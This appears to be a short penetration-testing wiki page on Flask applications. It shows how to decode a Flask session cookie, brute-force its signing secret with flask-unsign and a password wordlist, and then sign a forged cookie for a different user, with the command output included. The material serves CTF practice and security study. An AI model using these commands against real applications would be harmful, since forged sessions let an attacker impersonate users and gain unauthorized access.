Flask
Last updated
Was this helpful?
Last updated
Was this helpful?
Probably if you are playing a CTF a Flask application will be related to SSTI.
Default cookie session name is session
. Decode cookie online here or manually by getting the first part of the cookie until the first point and Base64 decode it:
echo "ImhlbGxvIg" | base64 -d
The cookie is signed using a password.
Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
## Decode
$ flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYXNkZiJ9.YosnvA.92mU6dpP4-5opRXc6h2EhLq8hVI'
{'logged_in': True, 'username': 'asdf'}
## Brute force
$ flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYXNkZiJ9.YosnvA.92mU6dpP4-5opRXc6h2EhLq8hVI' --no-literal-eval
[*] Session decodes to: {'logged_in': True, 'username': 'asdf'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 17152 attempts
b'secret123'
## Sign
$ flask-unsign --sign --cookie "{'logged_in': True, 'username': 'blue'}" --secret 'secret123'
eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYmx1ZSJ9.Yos0Lw.Lp1b4zGs-GrDuPvgxv2kkkC3qzE